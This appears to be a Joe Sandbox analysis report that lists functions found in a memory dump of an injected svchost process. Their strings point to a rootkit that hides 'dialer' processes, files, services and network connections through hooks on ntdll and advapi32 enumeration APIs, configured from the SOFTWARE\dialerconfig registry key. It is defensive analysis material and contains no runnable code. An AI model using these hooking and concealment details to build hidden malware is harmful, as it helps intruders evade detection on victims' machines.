Instruction Fuzzy Hash: 69E1F032B04A81DAFB00CF64D488BDD7BBAF3457C8F249116DE4A57B99DA39D42AC700

Function 000002C06FD41650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002C06FD4165B
HeapAlloc.KERNEL32 ref: 000002C06FD4166A

Part of subcall function 000002C06FD41274: GetProcessHeap.KERNEL32 ref: 000002C06FD4127A
Part of subcall function 000002C06FD41274: HeapAlloc.KERNEL32 ref: 000002C06FD41289
Part of subcall function 000002C06FD41274: GetProcessHeap.KERNEL32 ref: 000002C06FD412A3
Part of subcall function 000002C06FD41274: HeapAlloc.KERNEL32 ref: 000002C06FD412B4

RegOpenKeyExW.ADVAPI32 ref: 000002C06FD416DA
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41707
RegCloseKey.ADVAPI32 ref: 000002C06FD41721
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41741
RegCloseKey.ADVAPI32 ref: 000002C06FD4175C
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD4177C
RegCloseKey.ADVAPI32 ref: 000002C06FD41797
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD417B7
RegCloseKey.ADVAPI32 ref: 000002C06FD417D2
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD417F2
RegCloseKey.ADVAPI32 ref: 000002C06FD4180D
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD4182D
RegCloseKey.ADVAPI32 ref: 000002C06FD41848
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD41868
RegCloseKey.ADVAPI32 ref: 000002C06FD41883
RegOpenKeyExW.ADVAPI32 ref: 000002C06FD418A3
RegCloseKey.ADVAPI32 ref: 000002C06FD418BE
RegCloseKey.ADVAPI32 ref: 000002C06FD418C8

Part of subcall function 000002C06FD412C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002C06FD41326
Part of subcall function 000002C06FD412C8: GetProcessHeap.KERNEL32 ref: 000002C06FD41334
Part of subcall function 000002C06FD412C8: HeapAlloc.KERNEL32 ref: 000002C06FD41345
Part of subcall function 000002C06FD412C8: RegEnumValueW.ADVAPI32 ref: 000002C06FD413A1
Part of subcall function 000002C06FD412C8: GetProcessHeap.KERNEL32 ref: 000002C06FD413E9
Part of subcall function 000002C06FD412C8: HeapAlloc.KERNEL32 ref: 000002C06FD413F7
Part of subcall function 000002C06FD412C8: GetProcessHeap.KERNEL32 ref: 000002C06FD4141B
Part of subcall function 000002C06FD412C8: HeapFree.KERNEL32 ref: 000002C06FD41429
Part of subcall function 000002C06FD412C8: lstrlenW.KERNEL32 ref: 000002C06FD41432
Part of subcall function 000002C06FD412C8: GetProcessHeap.KERNEL32 ref: 000002C06FD41440
Part of subcall function 000002C06FD412C8: HeapAlloc.KERNEL32 ref: 000002C06FD4144E

Strings

service_names, xrefs: 000002C06FD417EB
SOFTWARE\dialerconfig, xrefs: 000002C06FD416BA
tcp_local, xrefs: 000002C06FD41826
paths, xrefs: 000002C06FD417B0
process_names, xrefs: 000002C06FD41775
pid, xrefs: 000002C06FD4173A
startup, xrefs: 000002C06FD416FD
tcp_remote, xrefs: 000002C06FD41861
udp, xrefs: 000002C06FD4189C

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 7fdffcc956c09322305df7fdf156fa11874812b82149af1904002b6e89e895f0
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 03712926310B50C6FF119F65E8C9B9D27AAFB88B89F501111DE4D97B28EF3AD468C700

Function 000002C06FD412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002C06FD41326
GetProcessHeap.KERNEL32 ref: 000002C06FD41334
HeapAlloc.KERNEL32 ref: 000002C06FD41345
RegEnumValueW.ADVAPI32 ref: 000002C06FD413A1

Part of subcall function 000002C06FD41554: StrCmpIW.SHLWAPI ref: 000002C06FD41585

GetProcessHeap.KERNEL32 ref: 000002C06FD413E9
HeapAlloc.KERNEL32 ref: 000002C06FD413F7
GetProcessHeap.KERNEL32 ref: 000002C06FD4141B
HeapFree.KERNEL32 ref: 000002C06FD41429
lstrlenW.KERNEL32 ref: 000002C06FD41432
GetProcessHeap.KERNEL32 ref: 000002C06FD41440
HeapAlloc.KERNEL32 ref: 000002C06FD4144E
StrCpyW.SHLWAPI ref: 000002C06FD41470
GetProcessHeap.KERNEL32 ref: 000002C06FD41485
HeapFree.KERNEL32 ref: 000002C06FD41493

Strings

d, xrefs: 000002C06FD41365

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 12b1175003206c3c8734227f7cb45702c047fc1fc527c8af9a3728a4e90b6891
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 6D513772214B44D2FF15DF62E589B9EB3AAF788B80F148124DA9907B14DF39E075C700

Function 000002C06FD41EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002C06FD41EBF

Part of subcall function 000002C06FD42174: GetModuleHandleA.KERNEL32 ref: 000002C06FD4218C
Part of subcall function 000002C06FD42174: GetProcAddress.KERNEL32 ref: 000002C06FD4219D

Part of subcall function 000002C06FD45C10: GetCurrentThreadId.KERNEL32 ref: 000002C06FD45C4B

Strings

sechost.dll, xrefs: 000002C06FD41FD9
advapi32.dll, xrefs: 000002C06FD41F97, 000002C06FD41FB8
NtQuerySystemInformation, xrefs: 000002C06FD41EE5
NtDeviceIoControlFile, xrefs: 000002C06FD41FF6
NtEnumerateKey, xrefs: 000002C06FD41F59
NtEnumerateValueKey, xrefs: 000002C06FD41F76
ntdll.dll, xrefs: 000002C06FD41ECD
EnumServicesStatusExW, xrefs: 000002C06FD41FB1, 000002C06FD41FD2
NtResumeThread, xrefs: 000002C06FD41F02
EnumServiceGroupW, xrefs: 000002C06FD41F90
NtQueryDirectoryFileEx, xrefs: 000002C06FD41F3C
NtQueryDirectoryFile, xrefs: 000002C06FD41F1F

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 860c323db0625b6309e167cf1ba6b3dee5232e2f11ef1652efb44f843d078e04
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 1C31B4A111095AE0FF04EFA5E8DDFDC236BBB94349FE04413951982165DE3AE27EC790

Function 000002C06FD423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002C06FD42405
GetCurrentProcessId.KERNEL32 ref: 000002C06FD4240F

Part of subcall function 000002C06FD419AC: OpenProcess.KERNEL32 ref: 000002C06FD419CA
Part of subcall function 000002C06FD419AC: IsWow64Process.KERNEL32 ref: 000002C06FD419E0
Part of subcall function 000002C06FD419AC: CloseHandle.KERNEL32 ref: 000002C06FD419FB

CreateFileW.KERNEL32 ref: 000002C06FD42468
WriteFile.KERNEL32 ref: 000002C06FD42490
ReadFile.KERNEL32 ref: 000002C06FD424AF
CloseHandle.KERNEL32 ref: 000002C06FD424B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002C06FD4243F
\\.\pipe\dialerchildproc64, xrefs: 000002C06FD42438

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: b6e1415f3fae056ff5b8c3054efa91bc2a55c791f8b4cfbfefff056fe1b9c39c
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 25214C36614B40C3FB10CF25E489B5E77A6F389BA9F604215EA5947BA8CF3DD159CB00

Function 000002C06F7B69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002C06F7B6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000002C06F7B6A6A
_RTC_Initialize.LIBCMT ref: 000002C06F7B6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002C06F7B6ABE
__scrt_release_startup_lock.LIBCMT ref: 000002C06F7B6AE9

Memory Dump Source

Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: a3d6534f1ed353e44835bda4d8e774e83f0dfb0052b4a37eda8d837624c94864
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 4B81C121600281CAFA50AFE69CCDF9DE2ACE747780F744065AB0453796DA3BCB668300

Function 000002C06FD475F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002C06FD47618
__scrt_acquire_startup_lock.LIBCMT ref: 000002C06FD4766A
_RTC_Initialize.LIBCMT ref: 000002C06FD47698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002C06FD476BE
__scrt_release_startup_lock.LIBCMT ref: 000002C06FD476E9

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 96bae89d7dd669b3ec66a15d46cdea272c4d03b9eba937c73ddf59c4c3935570
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: D381F030B04341E6FF50AF69D8C9F9D26DFBB85780F784425AA0887796DB3BE8658710

Function 000002C06FD49804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 000002C06FD49889
GetLastError.KERNEL32 ref: 000002C06FD49897
LoadLibraryExW.KERNEL32 ref: 000002C06FD498C1
FreeLibrary.KERNEL32 ref: 000002C06FD49907
GetProcAddress.KERNEL32 ref: 000002C06FD49913

Strings

api-ms-, xrefs: 000002C06FD498A9

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 54a0eb139fe5e5265618aecf017be00832ba99c92d2e56134daf7c743366adfe
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 8831C332202B50D1FE169F17E988F9D63DEBB08BA4F295525ED2D47388DF39E0658301

Function 000002C06FD51B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002C06FD51BCD
GetLastError.KERNEL32 ref: 000002C06FD51BD9
CloseHandle.KERNEL32 ref: 000002C06FD51BF1
CreateFileW.KERNEL32 ref: 000002C06FD51C1C
WriteConsoleW.KERNEL32 ref: 000002C06FD51C3B

Strings

CONOUT$, xrefs: 000002C06FD51BFD

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: dc6b4728255849dd63e413ae0557b119ed5ab33808c75448e84feb0c89431e44
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: DB11C132314B40C6FB509F16E899B1DB3AAF398FE4F200224EA5D87794CF7AD9648740

Function 000002C06FD45C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C06FD45C4B
GetThreadContext.KERNEL32 ref: 000002C06FD45DB5

Part of subcall function 000002C06FD45A40: GetCurrentThreadId.KERNEL32 ref: 000002C06FD45A44

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 49c35667e0371822ec87b057df76f49bfb754ea8591b862669f28041412a3d7f
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 79D1AA76208B88C2EE70DF19E49875E77E5F788B84F200116EA8D47BA5DF3AD551CB10

Function 000002C06FD430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002C06FD430D7
HeapAlloc.KERNEL32 ref: 000002C06FD430EA
StrCmpNIW.SHLWAPI ref: 000002C06FD4316B
GetProcessHeap.KERNEL32 ref: 000002C06FD431D1
HeapFree.KERNEL32 ref: 000002C06FD431DF

Strings

dialer, xrefs: 000002C06FD43164

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: b030431e6c28feafafe7ce1907f865213bc35bd2e0bc1291a2c748e83d4fde88
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 56319322701B51C2FF15DF1AE889B6D63EAFB44B84F1840209E4907B54EF3AE4B1CB00

Function 000002C06FD41A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002C06FD41A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000002C06FD41A58
PathFindFileNameW.SHLWAPI ref: 000002C06FD41A67
lstrlenW.KERNEL32 ref: 000002C06FD41A73
StrCpyW.SHLWAPI ref: 000002C06FD41A86
CloseHandle.KERNEL32 ref: 000002C06FD41A94

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: f5beae198df69654803035c8ee59978a31192614c9c59f2cac1c052defed054e
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: D3013521300A4196FE119F22E89DB5963AAE788BC0F688435CE8943754DE3AD9AA8700

Function 000002C06FD437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000002C06FD437C8
GetCurrentProcess.KERNEL32 ref: 000002C06FD437D6
VirtualProtectEx.KERNEL32 ref: 000002C06FD437F8
GetCurrentProcess.KERNEL32 ref: 000002C06FD43819
VirtualProtectEx.KERNEL32 ref: 000002C06FD4383A
TerminateThread.KERNEL32 ref: 000002C06FD43849

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 3b80af9e24587d0d9d1899819f79b500b7dca79ad8011e6b59bae33b7fd60ac4
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 71112D65611740C2FF259F25E48EB1EA7AABB58B85F240424CD4947754EF3ED428D700

Function 000002C06FD490D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002C06FD49103
_IsNonwritableInCurrentImage.LIBCMT ref: 000002C06FD49198
RtlUnwindEx.NTDLL ref: 000002C06FD491E7

Strings

csm, xrefs: 000002C06FD4917E
f, xrefs: 000002C06FD49116

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: a960c7c1bc8905fba12cc248bc61c653e8f0415e02c0a8b695fc3bba292e2b92
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 93516832211600DBFF14DF26E5C8F5D37EAF384B88FA48120AA564778CDA36E861CB01

Function 000002C06FD41AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002C06FD41AD8
StrCmpNIW.SHLWAPI ref: 000002C06FD41AF2
lstrlenW.KERNEL32 ref: 000002C06FD41B01
StrCpyW.SHLWAPI ref: 000002C06FD41B16

Strings

\\?\, xrefs: 000002C06FD41AE6

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 30774f4dde6dee3c055a3ba5394038e7a39669da777cb732b3f861e9294aaa21
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 31F04F22304641D2FF209F65F4DDB5E6766F744B88F949020CA4947A54DF3ED6ACCB00

Function 000002C06FD43200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000002C06FD43222
StrCpyW.SHLWAPI ref: 000002C06FD43232
StrCatW.SHLWAPI ref: 000002C06FD4323E
PathCombineW.SHLWAPI ref: 000002C06FD4324C

Strings

\\.\pipe\, xrefs: 000002C06FD43218

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 0d6570bc86338e536da71a5cb97cd5ab11df822838e4752137189de2ea94f407
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: AEF08220304B90D2FE008F57F98A62D626BAB48FD0F288131DE5A07B28CE3DD4A18300

Function 000002C06FD4A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002C06FD4A154
GetProcAddress.KERNEL32 ref: 000002C06FD4A16A
FreeLibrary.KERNEL32 ref: 000002C06FD4A187

Strings

mscoree.dll, xrefs: 000002C06FD4A14B
CorExitProcess, xrefs: 000002C06FD4A163

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 8fa19de9e5d5395881d905420ee06ed50be22dda3cd3c50482652cd341a72cbd
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 9AF08262311B40D1FF454F60E8DDB6D23ABAB48B80F242029950B46560CF39E4BCCB00

Function 000002C06FD451B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C06FD45236

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 4d9aac5b05dc62947cac28c931583a5c4d47a1081e4c4a99eeb696082d87e7d2
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 2B02C736219B80C6EB60CF59E49875EB7A6F3C5784F204115EA8E87BA8DF7DD494CB00

Function 000002C06FD50860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002C06FD508A2
GetConsoleMode.KERNEL32 ref: 000002C06FD50960
GetLastError.KERNEL32 ref: 000002C06FD509EA

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 987367d9887e58293ec015e7aba903c4eae8b5b32b9dd99c4623428e3c1d4658
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 1681D122610602C9FF50AFA4C8CCFAD2BABF794BD8F645115DE0A57795DB36A461C310

Function 000002C06FD457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002C06FD45806

Memory Dump Source

Source File: 0000001C.00000002.2686973591.000002C06FD40000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06FD40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06fd40000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: c5723c00159b153b82166e1aadd33ed305f997f2f7886f31a57f8807874e76ef
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 8861B936519A40C6FB608F59E488B1EB7EAF388744F200115FA8D87BA8DB7ED460CF40

Function 000002C06F7C12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002C06F7C12E0
_set_statfp.LIBCMT ref: 000002C06F7C12FB
_set_statfp.LIBCMT ref: 000002C06F7C1317
_set_statfp.LIBCMT ref: 000002C06F7C1353

Memory Dump Source

Source File: 0000001C.00000002.2685755111.000002C06F7B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002C06F7B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_2c06f7b0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 5cb7954cfda182ab1e12fa401ada5d195f4b4b6dbbe45c473128de64ae4179e9
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 41112922A40E00CDF6641DE5E4DEF6D84486B56378F784239EA7607BD6CADA8F624100

Function 000002C06FD51EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002C06FD51EE0
_set_statfp.LIBCMT ref: 000002C06FD51EFB
_set_statfp.LIBCMT ref: 000002C06FD51F17
_set_statfp.LIBCMT ref: 000002C06FD51F53

Memory Dump Source

